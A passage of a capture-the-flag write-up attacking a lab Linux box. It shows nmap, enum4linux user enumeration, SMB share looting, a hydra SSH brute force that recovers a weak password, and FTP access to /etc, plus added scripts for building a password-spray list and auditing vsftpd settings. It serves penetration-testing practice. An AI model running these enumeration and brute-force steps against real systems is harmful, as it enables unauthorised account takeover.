This has turned out to be quite a fun box to attack because it has multiple ways in and supposedly multiple escalation methods too. I prefer this sort of CTF to the ones where they hide passwords in Base64 encoded jpgs in the page source and that sort of thing. This is less of a puzzle/game and more realistic, albeit an unrealistically badly configured security setup.
N.B. when I write these up, I write as I’m doing it so it’s not a carefully edited walk-through as such but more of a record (for myself) as to what I did, as I did and the thought-processes which I’m hoping to improve.
Initial Enumeration
A quick initial nmap scan shows the following ports open:
root@kali2017-1:~# nmap -sS -n 10.0.0.4

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-20 11:39 GMT
Nmap scan report for 10.0.0.4
Host is up (0.00032s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
MAC Address: 00:0C:29:92:88:9B (VMware)
The nmap version scan shows:
root@kali2017-1:~# nmap -sV -n 10.0.0.4

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-20 11:47 GMT
Nmap scan report for 10.0.0.4
Host is up (0.00036s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp   open   domain      dnsmasq 2.75
80/tcp   open   http        PHP cli server 5.5 or later
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
The nmap OS detection scan isn't conclusive: some kind of Linux 3.x/4.x. Whilst I'm getting on with other things, I'll run a full-port scan for both TCP and UDP.
Anon FTP
So far I can see we've got a Linux box with FTP, SSH, DNS, a web server, Samba and MySQL running. There is an open FTP port, so let's see if anonymous access is allowed:
root@kali2017-1:~# ftp 10.0.0.4
Connected to 10.0.0.4.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (10.0.0.4:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp>
It is, but there's nothing in there. The banner, however, gives a potential username: “Harry”.
I forgot to do a more complete look, so I give ls -a a try: there is a file called “note” and it lets me GET it.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 04  2016 .
drwxr-xr-x    2 0        0            4096 Jun 04  2016 ..
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (97.2925 kB/s)
The Note file says “Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.”
So two more possible usernames, Elly and John, and furthermore it would appear that John is possibly the admin of the system, or at least a bit bossy.
I try seeing if I can simply browse further up the file system tree but I can’t. I could try brute-forcing SSH and FTP but really I don’t actually know the usernames for sure at this point.
SAMBA SHARES
Let’s take a look at the SMB shares with enum4linux
root@kali2017-1:~# enum4linux -a 10.0.0.4
Starting enum4linux v0.8.9 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov 20 12:40:18 2017

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.0.0.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ================================================
|    Enumerating Workgroup/Domain on 10.0.0.4    |
 ================================================
[+] Got domain/workgroup name: WORKGROUP

 ========================================
|    Nbtstat Information for 10.0.0.4    |
 ========================================
Looking up status of 10.0.0.4
    RED             <00> -         H <ACTIVE>  Workstation Service
    RED             <03> -         H <ACTIVE>  Messenger Service
    RED             <20> -         H <ACTIVE>  File Server Service
    WORKGROUP       <00> - <GROUP> H <ACTIVE>  Domain/Workgroup Name
    WORKGROUP       <1e> - <GROUP> H <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

 =================================
|    Session Check on 10.0.0.4    |
 =================================
[+] Server 10.0.0.4 allows sessions using username '', password ''

 =======================================
|    Getting domain SID for 10.0.0.4    |
 =======================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ==================================
|    OS information on 10.0.0.4    |
 ==================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.0.0.4 from smbclient:
[+] Got OS info for 10.0.0.4 from srvinfo:
    RED            Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
    platform_id     :    500
    os version      :    6.1
    server type     :    0x809a03

 =========================
|    Users on 10.0.0.4    |
 =========================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 =====================================
|    Share Enumeration on 10.0.0.4    |
 =====================================
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    kathy           Disk      Fred, What are we doing here?
    tmp             Disk      All temporary files should be stored here
    IPC$            IPC       IPC Service (red server (Samba, Ubuntu))

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP

[+] Attempting to map shares on 10.0.0.4
//10.0.0.4/print$    Mapping: DENIED, Listing: N/A
//10.0.0.4/kathy     Mapping: OK, Listing: OK
//10.0.0.4/tmp       Mapping: OK, Listing: OK
//10.0.0.4/IPC$      Mapping: OK  Listing: DENIED

 ================================================
|    Password Policy Information for 10.0.0.4    |
 ================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 33, in <module>
    from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

 ==========================
|    Groups on 10.0.0.4    |
 ==========================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 ===================================================================
|    Users on 10.0.0.4 via RID cycling (RIDS: 500-550,1000-1050)    |
 ===================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
That's a ton of info, including confirmed usernames. I notice some of the names collected before don't tally here: e.g. there is no user “Harry” and no user with H as a first initial. Sadly there is more than one user with J as a first initial, so I can't tell which one is the suspected higher-level user “John”.
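Turning the RID-cycling output plus the names from the banner, the note and the share comment into a single username list is the tedious bit, so here is a small script for it. This is an added example, not part of the original writeup or of enum4linux; the sample lines are a subset of the enum4linux output above and the list of informal names is taken from the banner, note and share comment seen so far. The S-1-22-1-<n> SIDs are Samba's mapping of local Unix uids, so the RID is the uid. The initial-matching heuristic (a first name such as “John” against accounts like JKanode) is my own rule of thumb and only narrows the candidates; it cannot decide between them.

```python
"""Build a deduplicated username list for a password spray from enum4linux
RID-cycling output plus names harvested from banners and notes.
Added example, not code from the original writeup."""
import re

# Constructed sample: a subset of the RID-cycling lines printed above.
ENUM4LINUX_OUTPUT = """
S-1-22-1-1000 Unix User\\peter (Local User)
S-1-22-1-1001 Unix User\\RNunemaker (Local User)
S-1-22-1-1010 Unix User\\MFrei (Local User)
S-1-22-1-1013 Unix User\\JKanode (Local User)
S-1-22-1-1017 Unix User\\JLipps (Local User)
S-1-22-1-1029 Unix User\\elly (Local User)
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
"""

# Names dropped in the FTP banner, the anonymous "note" and the kathy share comment.
INFORMAL_NAMES = ["Harry", "Elly", "John", "Fred", "Kathy"]

# S-1-22-1-<uid> is Samba's SID for a local Unix user; groups use other SIDs.
RID_USER_RE = re.compile(r"^S-1-22-1-(\d+)\s+Unix User\\(\S+)\s+\(Local User\)")


def parse_rid_users(text):
    """Return {username: uid} for every 'Unix User' line in enum4linux output."""
    users = {}
    for line in text.splitlines():
        m = RID_USER_RE.match(line.strip())
        if m:
            users[m.group(2)] = int(m.group(1))
    return users


def match_informal(name, confirmed):
    """Map a first name from a banner/note onto confirmed accounts.

    Exact case-insensitive match wins; otherwise return accounts in the
    <Initial><Surname> style whose initial matches (e.g. John -> JKanode,
    JLipps). More than one hit means a human still has to disambiguate."""
    exact = [u for u in confirmed if u.lower() == name.lower()]
    if exact:
        return exact
    return [u for u in confirmed
            if u[0].upper() == name[0].upper() and u[1:2].isupper()]


def build_spray_list(confirmed, informal):
    """Confirmed accounts plus any informal name with no confirmed counterpart
    (kept as a lower-case guess). Sorted and deduplicated, one per line for
    hydra -L. Names that resolved to a confirmed account are not duplicated."""
    names = set(confirmed)
    for n in informal:
        if not match_informal(n, confirmed):
            names.add(n.lower())
    return sorted(names, key=str.lower)


if __name__ == "__main__":
    users = parse_rid_users(ENUM4LINUX_OUTPUT)
    for n in INFORMAL_NAMES:
        print("%-6s -> %s" % (n, match_informal(n, users) or "no match"))
    print("\n".join(build_spray_list(users, INFORMAL_NAMES)))
```

Run against the full output above it reproduces the observations in the text: “Harry” and “Fred” match nothing, “Elly” resolves to elly, and “John” leaves two candidates (plus JBare in the full list), so John goes into the spray list only via those confirmed accounts.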
The shares section mentions Fred, and there are two accessible shares: tmp and kathy.
Let's connect to these and see what's in them:
root@kali2017-1:~# smbclient \\\\10.0.0.4\\tmp -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Jun  7 09:08:39 2016
  ..                                  D        0  Mon Jun  6 22:39:56 2016
  ls                                  N      274  Sun Jun  5 16:32:58 2016

        19478204 blocks of size 1024. 16396672 blocks available
smb: \> get ls /root/ls
getting file \ls of size 274 as /root/ls (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
The ls file contains:
.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Whilst I'm there I try creating a file called tmpfile.txt, and I can.
The kathy share has:
smb: \> ls
  .                                   D        0  Fri Jun  3 17:52:52 2016
  ..                                  D        0  Mon Jun  6 22:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 16:02:27 2016
  backup                              D        0  Sun Jun  5 16:04:14 2016
I try adding a file to this share but I am not allowed.
In the backup folder there are two files: a vsftpd.conf and a wordpress.tar.gz archive.
The vsftpd.conf file:
# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone?  vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.
listen=YES
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=NO
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
anon_root=/var/ftp/anonymous
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
#write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
#local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
#anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in your local time zone. The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
banner_file=/etc/vsftpd.banner
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories. See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty. Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
pasv_enable=no
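The interesting directives are buried in the comments: anonymous_enable=YES, local_enable=YES with local_root=/etc (so every local user's FTP session starts in /etc, which is where the MFrei login later lands), ssl_enable=NO (credentials in the clear), and userlist_enable=YES without userlist_deny, meaning vsftpd.user_list is a deny list and an empty file blocks nobody. Below is a small auditor that pulls those out, with a hardened counterpart beside the recovered settings. It is an added example, not code from the writeup or from vsftpd; the two configs are mine (the first is the effective subset of the file above with comments dropped), and the defaults it assumes are the ones documented in vsftpd.conf(5): anonymous_enable YES, local_enable NO, chroot_local_user NO, ssl_enable NO, userlist_enable NO, userlist_deny YES.

```python
"""Audit a vsftpd.conf for the directives that made this box's FTP service a
problem, and compare against a hardened version. Added example, not from the
writeup or the vsftpd project."""

# Effective directives from the recovered /etc/vsftpd.conf (comments removed).
RECOVERED_CONF = """
listen=YES
anonymous_enable=YES
anon_root=/var/ftp/anonymous
local_enable=YES
#write_enable=YES
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
ssl_enable=NO
pasv_enable=no
"""

# Hardened counterpart (my suggestion, not something found on the box):
# no anonymous login, users jailed in their own homes, an allow-list of
# accounts (userlist_deny=NO turns user_list into an allow list), TLS required.
HARDENED_CONF = """
listen=YES
anonymous_enable=NO
local_enable=YES
chroot_local_user=YES
allow_writeable_chroot=NO
userlist_enable=YES
userlist_deny=NO
userlist_file=/etc/vsftpd.user_list
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""


def parse_vsftpd(text):
    """vsftpd.conf is one 'key=value' per line with '#' comments; commented-out
    directives (like #write_enable=YES above) are deliberately not settings."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def is_yes(conf, key, default="NO"):
    """vsftpd booleans accept YES/yes/no, so compare case-insensitively."""
    return conf.get(key, default).upper() == "YES"


def audit_vsftpd(conf):
    """Return (directive, finding) pairs. Defaults per vsftpd.conf(5)."""
    findings = []
    if is_yes(conf, "anonymous_enable", "YES"):
        findings.append(("anonymous_enable", "anonymous logins are allowed"))
    if is_yes(conf, "local_enable"):
        root = conf.get("local_root")
        if root and root.rstrip("/") in ("", "/etc", "/root"):
            findings.append(("local_root",
                             "every local user is dropped into %s after login" % root))
        if not is_yes(conf, "chroot_local_user"):
            findings.append(("chroot_local_user",
                             "local users can browse the whole filesystem"))
        if not is_yes(conf, "ssl_enable"):
            findings.append(("ssl_enable",
                             "local credentials and data travel in cleartext"))
        if is_yes(conf, "userlist_enable") and is_yes(conf, "userlist_deny", "YES"):
            findings.append(("userlist_enable",
                             "user_list is a deny list (userlist_deny defaults to YES); "
                             "an empty file blocks nobody"))
    return findings


if __name__ == "__main__":
    for label, text in (("recovered", RECOVERED_CONF), ("hardened", HARDENED_CONF)):
        print(label)
        for key, msg in audit_vsftpd(parse_vsftpd(text)) or [("-", "no findings")]:
            print("  %-20s %s" % (key, msg))
```

Note that with local_root=/etc the chroot does nothing useful: the listing a local user gets later in this writeup includes passwd (world-readable, so it can be pulled) but shadow is 0640 root:shadow and sudoers is 0440, so those stay out of reach over FTP. The empty vsftpd.user_list and vsftpd.chroot_list in that same listing are what the userlist finding is about.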
In kathy_stuff folder there is a to-do list saying: “I’m making sure to backup anything important for Initech, Kathy”
So maybe Initech are a client: they've done a WordPress site for them and set up vsftpd for them to transfer files, and we're told where the key files for that are, which could come in handy. I think I have enough usernames to give a quick SSH brute-force a shot. I collected up all the names, put them in a file and ran hydra against them with a short password list from SecLists:
root@kali2017-1:~# hydra 10.0.0.7 ssh -L /root/Desktop/users.txt -P /usr/share/seclists/Passwords/top_shortlist.txt -f -V -t 5
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
....
....
[22][ssh] host: 10.0.0.7   login: MFrei   password: letmein
[STATUS] attack finished for 10.0.0.7 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
FTP with credentials
So I have a login now, no doubt for a non-admin user. Let's try him on the FTP:
root@kali2017-1:~# ftp 10.0.0.4
Connected to 10.0.0.4.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (10.0.0.4:root): MFrei
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    5 0        0            4096 Jun 03  2016 X11
drwxr-xr-x    3 0        0            4096 Jun 03  2016 acpi
-rw-r--r--    1 0        0            3028 Apr 20  2016 adduser.conf
-rw-r--r--    1 0        0              51 Jun 03  2016 aliases
-rw-r--r--    1 0        0           12288 Jun 03  2016 aliases.db
drwxr-xr-x    2 0        0            4096 Jun 07  2016 alternatives
drwxr-xr-x    8 0        0            4096 Jun 03  2016 apache2
drwxr-xr-x    3 0        0            4096 Jun 03  2016 apparmor
drwxr-xr-x    9 0        0            4096 Jun 06  2016 apparmor.d
drwxr-xr-x    3 0        0            4096 Jun 03  2016 apport
drwxr-xr-x    6 0        0            4096 Jun 03  2016 apt
-rw-r-----    1 0        1             144 Jan 14  2016 at.deny
drwxr-xr-x    5 0        0            4096 Jun 03  2016 authbind
-rw-r--r--    1 0        0            2188 Aug 31  2015 bash.bashrc
drwxr-xr-x    2 0        0            4096 Jun 03  2016 bash_completion.d
-rw-r--r--    1 0        0             367 Jan 27  2016 bindresvport.blacklist
drwxr-xr-x    2 0        0            4096 Apr 12  2016 binfmt.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 byobu
drwxr-xr-x    3 0        0            4096 Jun 03  2016 ca-certificates
-rw-r--r--    1 0        0            7788 Jun 03  2016 ca-certificates.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 console-setup
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.daily
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.hourly
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.monthly
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.weekly
-rw-r--r--    1 0        0             722 Apr 05  2016 crontab
-rw-r--r--    1 0        0              54 Jun 03  2016 crypttab
drwxr-xr-x    2 0        0            4096 Jun 03  2016 dbconfig-common
drwxr-xr-x    4 0        0            4096 Jun 03  2016 dbus-1
-rw-r--r--    1 0        0            2969 Nov 10  2015 debconf.conf
-rw-r--r--    1 0        0              12 Apr 30  2015 debian_version
drwxr-xr-x    3 0        0            4096 Jun 05  2016 default
-rw-r--r--    1 0        0             604 Jul 02  2015 deluser.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 depmod.d
drwxr-xr-x    4 0        0            4096 Jun 03  2016 dhcp
-rw-r--r--    1 0        0           26716 Jul 30  2015 dnsmasq.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 dnsmasq.d
drwxr-xr-x    4 0        0            4096 Jun 07  2016 dpkg
-rw-r--r--    1 0        0              96 Apr 20  2016 environment
drwxr-xr-x    4 0        0            4096 Jun 03  2016 fonts
-rw-r--r--    1 0        0             594 Jun 03  2016 fstab
-rw-r--r--    1 0        0             132 Feb 10  2016 ftpusers
-rw-r--r--    1 0        0             280 Jun 20  2014 fuse.conf
-rw-r--r--    1 0        0            2584 Feb 18  2016 gai.conf
-rw-rw-r--    1 0        0            1253 Jun 04  2016 group
-rw-------    1 0        0            1240 Jun 03  2016 group-
drwxr-xr-x    2 0        0            4096 Jun 03  2016 grub.d
-rw-r-----    1 0        42           1004 Jun 04  2016 gshadow
-rw-------    1 0        0             995 Jun 03  2016 gshadow-
drwxr-xr-x    3 0        0            4096 Jun 03  2016 gss
-rw-r--r--    1 0        0              92 Oct 22  2015 host.conf
-rw-r--r--    1 0        0              12 Jun 03  2016 hostname
-rw-r--r--    1 0        0             469 Jun 05  2016 hosts
-rw-r--r--    1 0        0             411 Jun 03  2016 hosts.allow
-rw-r--r--    1 0        0             711 Jun 03  2016 hosts.deny
-rw-r--r--    1 0        0            1257 Jun 03  2016 inetd.conf
drwxr-xr-x    2 0        0            4096 Feb 06  2016 inetd.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 init
drwxr-xr-x    2 0        0            4096 Jun 06  2016 init.d
drwxr-xr-x    5 0        0            4096 Jun 03  2016 initramfs-tools
-rw-r--r--    1 0        0            1748 Feb 04  2016 inputrc
drwxr-xr-x    3 0        0            4096 Jun 03  2016 insserv
-rw-r--r--    1 0        0             771 Mar 06  2015 insserv.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 insserv.conf.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 iproute2
drwxr-xr-x    2 0        0            4096 Jun 03  2016 iptables
drwxr-xr-x    2 0        0            4096 Jun 03  2016 iscsi
-rw-r--r--    1 0        0             345 Nov 20 12:37 issue
-rw-r--r--    1 0        0             197 Jun 03  2016 issue.net
drwxr-xr-x    2 0        0            4096 Jun 03  2016 kbd
drwxr-xr-x    5 0        0            4096 Jun 03  2016 kernel
-rw-r--r--    1 0        0             144 Jun 03  2016 kernel-img.conf
-rw-r--r--    1 0        0           26754 Jun 07  2016 ld.so.cache
-rw-r--r--    1 0        0              34 Jan 27  2016 ld.so.conf
drwxr-xr-x    2 0        0            4096 Jun 07  2016 ld.so.conf.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 ldap
-rw-r--r--    1 0        0             267 Oct 22  2015 legal
-rw-r--r--    1 0        0             191 Jan 18  2016 libaudit.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 libnl-3
drwxr-xr-x    4 0        0            4096 Jun 06  2016 lighttpd
-rw-r--r--    1 0        0            2995 Apr 14  2016 locale.alias
-rw-r--r--    1 0        0            9149 Jun 03  2016 locale.gen
-rw-r--r--    1 0        0            3687 Jun 03  2016 localtime
drwxr-xr-x    6 0        0            4096 Jun 03  2016 logcheck
-rw-r--r--    1 0        0           10551 Mar 29  2016 login.defs
-rw-r--r--    1 0        0             703 May 06  2015 logrotate.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 logrotate.d
-rw-r--r--    1 0        0             103 Apr 12  2016 lsb-release
drwxr-xr-x    2 0        0            4096 Jun 03  2016 lvm
-r--r--r--    1 0        0              33 Jun 03  2016 machine-id
-rw-r--r--    1 0        0             111 Nov 20  2015 magic
-rw-r--r--    1 0        0             111 Nov 20  2015 magic.mime
-rw-r--r--    1 0        0            2579 Jun 03  2016 mailcap
-rw-r--r--    1 0        0             449 Oct 30  2015 mailcap.order
drwxr-xr-x    2 0        0            4096 Jun 03  2016 mdadm
-rw-r--r--    1 0        0           24241 Oct 30  2015 mime.types
-rw-r--r--    1 0        0             967 Oct 30  2015 mke2fs.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 modprobe.d
-rw-r--r--    1 0        0             195 Apr 20  2016 modules
drwxr-xr-x    2 0        0            4096 Jun 03  2016 modules-load.d
lrwxrwxrwx    1 0        0              19 Jun 03  2016 mtab -> ../proc/self/mounts
drwxr-xr-x    4 0        0            4096 Jun 06  2016 mysql
drwxr-xr-x    7 0        0            4096 Jun 03  2016 network
-rw-r--r--    1 0        0              91 Oct 22  2015 networks
drwxr-xr-x    2 0        0            4096 Jun 03  2016 newt
-rw-r--r--    1 0        0             497 May 04  2014 nsswitch.conf
drwxr-xr-x    2 0        0            4096 Apr 20  2016 opt
lrwxrwxrwx    1 0        0              21 Jun 03  2016 os-release -> ../usr/lib/os-release
-rw-r--r--    1 0        0            6595 Jun 23  2015 overlayroot.conf
-rw-r--r--    1 0        0             552 Mar 16  2016 pam.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 pam.d
-rw-r--r--    1 0        0            2908 Jun 04  2016 passwd
